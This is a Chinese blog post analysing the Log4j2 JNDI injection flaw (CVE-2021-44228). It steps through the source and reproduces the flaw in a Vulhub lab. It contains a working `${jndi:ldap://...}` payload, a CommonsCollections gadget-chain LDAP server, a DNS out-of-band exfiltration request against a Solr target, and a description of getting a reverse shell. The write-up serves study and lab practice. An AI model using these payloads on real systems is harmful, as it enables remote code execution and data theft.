log4j反序列化-流程分析

最新推荐文章于 2024-11-15 06:00:00 发布
最新推荐文章于 2024-11-15 06:00:00 发布
阅读量1.3k 收藏 9
点赞数 34
分类专栏: log4j反序列化 文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45436292/article/details/140966742
版权

分析版本

JDK8u141
依赖

<dependencies>
    <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>

        <artifactId>log4j-core</artifactId>

        <version>2.14.1</version>

    </dependency>

    <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>

        <artifactId>log4j-api</artifactId>

        <version>2.14.1</version>

    </dependency>

</dependencies>

分析流程

官方文档Log4j – Log4j 2 Lookups (apache.org)
直接上payload再去分析

public class log4jTest {
    public static final Logger LOGGER = LogManager.getLogger(log4jTest.class);
    public static void main(String[] args) {
        LOGGER.error("${jndi:ldap://localhost:10389/cn=Exp,dc=example,dc=com}");
    }
}

log4j漏洞最后是调用了JNDI的lookup方法,之后的就是LDAP和RMI的流程了,所以我们分析lo4j把断点打在InitialContext#lookup处,看调用栈。
调用到MessagePatternConverter#format,对日志内容进行格式化,当日志内容包含${时,会调用到workingBuilder.append(config.getStrSubstitutor().replace(event, value));
在这里插入图片描述

之后调用StrSubstitutor#substitude,将{}之间内容提取出来

String varValue = resolveVariable(event, varName, buf, startPos, endPos); //此处varName已经为jndi:ldap://localhost:10389/cn=Exp,dc=example,dc=com

跟进StrSubstitutor#resolveVariable

protected String resolveVariable(final LogEvent event, final String variableName, final StringBuilder buf,
                                 final int startPos, final int endPos) {
    final StrLookup resolver = getVariableResolver();
    if (resolver == null) {
        return null;
    }
    return resolver.lookup(event, variableName);  //跟进
}

Interpolator#lookup

public String lookup(final LogEvent event, String var) {
    if (var == null) {
        return null;
    }

    final int prefixPos = var.indexOf(PREFIX_SEPARATOR);   //查找:的索引
    if (prefixPos >= 0) {
        final String prefix = var.substring(0, prefixPos).toLowerCase(Locale.US); //获取jndi
        final String name = var.substring(prefixPos + 1); //获取ldap://localhost:10389/cn=Exp,dc=example,dc=com
        final StrLookup lookup = strLookupMap.get(prefix);//下面解释
        if (lookup instanceof ConfigurationAware) {
            ((ConfigurationAware) lookup).setConfiguration(configuration);
        }
        String value = null;
        if (lookup != null) {
            value = event == null ? lookup.lookup(name) : lookup.lookup(event, name);//跟进
        }

        if (value != null) {
            return value;
        }
        var = var.substring(prefixPos + 1);
    }
    if (defaultLookup != null) {
        return event == null ? defaultLookup.lookup(var) : defaultLookup.lookup(event, var); 
    }
    return null;
}

在这里插入图片描述

很明显看到strLookupMap是个hashMap类,ookup = strLookupMap.get(prefix);调用key为jndi的value,得到JndiLookup跟进。
JndiManager.getDefaultManager()中会get一个JndiManager对象,context属性是InitialContext

//JndiLookup#lookup
public String lookup(final LogEvent event, final String key) {
    if (key == null) {
        return null;
    }
    final String jndiName = convertJndiName(key);
    try (final JndiManager jndiManager = JndiManager.getDefaultManager()) {
        return Objects.toString(jndiManager.lookup(jndiName), null);//调用
    } catch (final NamingException e) {
        LOGGER.warn(LOOKUP, "Error looking up JNDI resource [{}].", jndiName, e);
        return null;
    }
}

跟进JndiManager#lookup

public <T> T lookup(final String name) throws NamingException {
    return (T) this.context.lookup(name); //上面提到了context是InitialContext,所以调用Context.lookup()
}

之后就是JNDI的流程了
之后我切到JDK8u201版本,添加了CC依赖。进行JNDI的反序列化测试,一样的可以弹计算器,就是需要目标有可利用依赖。

public class JNDILDAPServerBypass {
    public static void main(String[] args) throws Exception {
        InitialContext initialContext = new InitialContext();
        //Reference refObj = new Reference("Test", "Test", "http://localhost:4444/");
        initialContext.rebind("ldap://localhost:10389/cn=Evil,dc=example,dc=com", getEvilPriorityQueue());

    }

    public static PriorityQueue getEvilPriorityQueue() throws Exception {
        //CC2
        byte[] code = Files.readAllBytes(Paths.get("G:\\Java反序列化\\class_test\\Test.class"));
        byte[][] codes = {code};
        TemplatesImpl templates = new TemplatesImpl();
        Class templatesClass = templates.getClass();
        Field name = templatesClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates, "pass");

        Field bytecodes = templatesClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates, codes);

        Field tfactory = templatesClass.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates, new TransformerFactoryImpl());


        InvokerTransformer<Object, Object> invokerTransformer = new InvokerTransformer<>("newTransformer", null, null);

        //chainedTransformer.transform(1);

        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1)); //改为ConstantTransformer,把利用链断掉
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);

        priorityQueue.add(templates);
        priorityQueue.add(1);

        ///Class transformingComparatorClass = TransformingComparator.class;  //也可以
        Class transformingComparatorClass = transformingComparator.getClass();
        Field transformer = transformingComparatorClass.getDeclaredField("transformer");
        transformer.setAccessible(true);
        transformer.set(transformingComparator, invokerTransformer);

        return priorityQueue;
    }

}

在这里插入图片描述

Vulhub靶场

进入vulhub-master/log4j/CVE-2021-44228拉取镜像
测试一些poc

DNS带外

可以拿到一些系统信息
${java:os} ${sys:java.version} java版本
${env:JAVA_HOME} 系统变量,等如果字符不符合DNS要求是获取不到的
举个例子获取靶机java版本http://192.168.20.130:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.hvu8vg.dnslog.cn}
在这里插入图片描述

在这里插入图片描述

反弹shell

用Yakit,先生成LDAP反弹shell的反连地址,反连主机我填的是kali
在这里插入图片描述

在这里插入图片描述

kali nc开启8888端口监听,拿到靶机shell
在这里插入图片描述

当然拿到的是docker权限
在这里插入图片描述

参考文章:Log4j2的JNDI注入漏洞(CVE-2021-44228)原理分析与思考 - FreeBuf网络安全行业门户

y06_z
关注
专栏目录
使用Newtonsoft.Json快速实现序列化与反序列化
麦迪儿的博客
04-22 1807
反序列化是将序列化后的数据还原成原始的数据结构的过程,使得我们可以从硬盘或网络中读取数据,并重新构建出与原始数据结构完全相同的对象、数组或字典等数据结构。Newtonsoft.Json是一个C# 中常用的 JSON 序列化和反序列化库,它支持 .NET 平台、Unity、Xamarin 等多个平台,并且提供了非常丰富的 API 和扩展功能。序列化和反序列化是计算机领域中常用的概念,用于将数据结构转换为字节流或字符串,并将其存储或传输,以便在需要时进行还原成原始数据结构。
Java原生序列化、Avro、RPC与Log4j
howard2005的专栏
12-14 1391
第13天——Java原生序列化、Avro、RPC与Log4j 一、Java原生序列化机制 二、Avro序列化框架 三、Avro序列化框架案例演示 四、利用Avro实现RPC 五、Log4j使用介绍 一、Java原生序列化机制 1、序列化作用 (1)数据持久化==>数据由内存存到磁盘上。 (2)网络数据传输(客户端<==>服务器端) 2、Jav...
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 4764
Log4j2 RCE漏洞原理与复现
Java安全之log4j反序列化漏洞分析
qq_43966957的博客
12-29 839
log4j用的其实还是比较多,记录一些Java的日志,这个相信接触过Java的都知道,在此不做多的赘诉。漏洞版本:CVE-2019-17571漏洞原因是因为调用开启一个端口,进行接受数据,进行反序列化操作。根据官方描述作用是把接受到的作为本地的日志记录事件,再使用在服务器端配置的Log4J环境来记录日志。默认可能会开启在4560端口中。
log4j反序列化远程命令执行以及个人原理理解
weixin_46626737的博客
08-11 375
目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数,发送到log4j,打印到日志中,开始解析{}中的内容,发现是ldap实现的jndi,然后调用lookup。功能去查找x.x.x.x/test.class该文件,然后发现是远程服务器的文件,需要通过codebase去下载该class类,然后下载后,对该class文件进行使用默认的构造器。类似于上一个漏洞的原理
log4j反序列化漏洞详解及利用
Mr.Wang的博客
12-20 1万+
Log4j漏洞详解:带你体验一把hacker之路!
【Java小姿势】Log4j2漏洞的前世今生
行雨斋
12-20 2943
A.源起 2021年12月9日,各大公司都被一个重量级漏洞引爆了,该漏洞一旦被攻击者利用就会造成及其严重的影响。经过快速分析和确认,该漏洞影响范围极其广泛,危害极其严重。然后从10日凌晨开始很多公司的程序员都被迫开始应急相应,加班加点修复问题。该漏洞涉及包含但不限于Struts2、Flink、ElasticSearch、Druid、dubbo、Redis、kafka等常用应用和组件。 爆出这个漏洞的这就是大名鼎鼎的日志组件log4j2 。作为日志组件,在java领域基本上是再常见运用不过的了,而这个漏洞可以
谈谈log4j反序列化
一个安全研究员
02-17 1341
文章发布在安全客:https://www.anquanke.com/post/id/195932
log4j反序列化
2403_82795493的博客
02-19 1170
Log4j在处理消息转换时,会按照字符检测每条日志,当日志中包含${}时,则会将表达式的内容替换成真实的内容(即lookup接口查找得到的内容),使用LDAP或RMI协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j的漏洞。
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
qq_62056583的博客
07-15 577
复现并分析【CVE-2017-5645】Apache Log4j Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞。
log4j中的日志反序列化与日志分析工具
# 章节一:log4j日志框架简介 ## 1.1 log4j的基本概念和用途 log4j是一个开源的Java日志框架,广泛应用于Java应用程序中。它可以将应用程序的运行日志输出到控制台、文件、数据库等不同的目的地,方便开发人员对...
Log4j源码解析--框架流程+核心解析
热门推荐
LinkinPark的博客
02-25 1万+
OK,现在我们来研究Log4j的源码: 这篇博客有参照上善若水的博客,原文出处:http://www.blogjava.net/DLevin/archive/2012/06/28/381667.html。感谢作者的无私分享。 Log4J将写日志功能抽象成七个核心类或者接口:Logger、LoggerRepository、Level、LoggingEvent、Appender、Layou
Log4j 注入漏洞:深入理解JNDI注入与Java反序列化漏洞的利用
Java Punk
12-23 3480
我翻阅了许多专题文章,其中有2篇文章写的非常不错,完美解答了我对 “Log4j 注入漏洞” 的疑问
单元测试时报错找不到@SpringBootConfiguration
m0_75138009的博客
11-13 360
(或者@SpringBootApplication)注解的类。如果没有,可以在测试类上添加。注解用于加载 Spring Boot 应用上下文,但它需要找到一个带有。错误表示 Spring Boot 在运行测试时无法找到。确保你的测试类所在的包或子包中存在一个带有。)注解的类来配置应用上下文。
DICOM图像解析:深入解析DICOM格式文件的高效读取与处理(续)
martian665的专栏
11-15 964
本文主要介绍如何高效处理压缩的像素数据和多帧图像数据。
C代码—单元测试中的覆盖率—学习笔记
WE_BIG的博客
11-13 898
单元测试中的覆盖率测试,如何选择合适的测试率,作为指标。要以具体的代码结构作为参考。
【MyBatis操作数据库】XML配置
2301_81305165的博客
11-13 692
由于没有对⽤⼾输⼊进⾏充分检查,⽽SQL⼜是拼接⽽成,在⽤⼾输⼊参数时,在参数中添加⼀些 SQL关键字,达到改变SQL运⾏结果的⽬的,也可以完成恶意攻击。这是因为#{} 会根据参数类型判断是否拼接引号,如果参数类型为String, 就会加上 引号,如果不想加上引号,就要使用${}SQL注⼊:是通过操作输⼊的数据来修改事先定义好的SQL语句,以达到执⾏代码对服务器进⾏攻击的。:是和mapper接⼝中定义的⽅法名称⼀样的,表⽰对接⼝的具体实现⽅法,:是返回的数据类型,也就是开头我们定义的实体类。
yolo算法-电线杆数据集-1493张图像带标签-.zip
最新发布
11-17
yolo算法-电线杆数据集-1493张图像带标签-.zip;yolo算法-电线杆数据集-1493张图像带标签-.zip;yolo算法-电线杆数据集-1493张图像带标签-.zip
yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip
11-17
yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip;yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip;yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip;yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip
Hibernate 3.5中文指南:持久化关系数据库
- 类型转换器(TypeConverters)可以定制非标准数据类型的序列化和反序列化。 Hibernate 3.5中文手册是学习和理解Hibernate持久化框架的宝贵资源,涵盖了从基本概念到高级特性的全面内容,对于Java开发者来说极具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值